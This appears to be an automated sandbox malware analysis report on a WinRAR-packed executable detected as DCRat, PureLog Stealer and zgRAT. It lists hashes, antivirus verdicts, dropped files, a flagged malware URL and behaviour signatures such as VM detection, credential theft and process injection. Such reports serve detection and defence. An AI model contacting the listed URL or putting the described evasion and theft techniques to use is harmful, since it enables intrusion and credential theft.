Windows Analysis Report
ugRGgCJhQl.exe

Overview

General Information

Sample name: ugRGgCJhQl.exe
renamed because original name is a hash value
Original sample name: 92949DD923E8E88C697092B5311C7D95.exe
Analysis ID: 1500382
MD5: 92949dd923e8e88c697092b5311c7d95
SHA1: cb61d5772f5e07467734af1c151e831ff225ea17
SHA256: b7d005d2dee9456e5fbdb5f7d46a7275a9c7000ec6cbf982eee58897f88fa4c8
Tags: DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: ugRGgCJhQl.exe Avira: detected
Source: http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\eVuUdNSS.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\ThQetCXk.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\comref\POAHIjOuJ41OH.vbe Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\comref\svchost.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\ApTjSBhc.log Virustotal: Detection: 14% Perma Link
Source: C:\Users\user\Desktop\LMrHnriI.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\LMrHnriI.log Virustotal: Detection: 28% Perma Link
Source: C:\Users\user\Desktop\ThQetCXk.log Virustotal: Detection: 21% Perma Link
Source: C:\Users\user\Desktop\eVuUdNSS.log ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\eVuUdNSS.log Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Desktop\jIMTFKhG.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\jIMTFKhG.log Virustotal: Detection: 27% Perma Link
Source: C:\comref\svchost.exe ReversingLabs: Detection: 71%
Source: C:\comref\svchost.exe Virustotal: Detection: 74% Perma Link
Source: ugRGgCJhQl.exe Virustotal: Detection: 56% Perma Link
Source: ugRGgCJhQl.exe ReversingLabs: Detection: 79%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\eVuUdNSS.log Joe Sandbox ML: detected
Source: C:\comref\svchost.exe Joe Sandbox ML: detected
Source: ugRGgCJhQl.exe Joe Sandbox ML: detected
Source: ugRGgCJhQl.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ugRGgCJhQl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: iC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: pC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: qC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ugRGgCJhQl.exe
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: zC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: {C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: lC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: |C:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: jC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_002EA69B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_002FC220
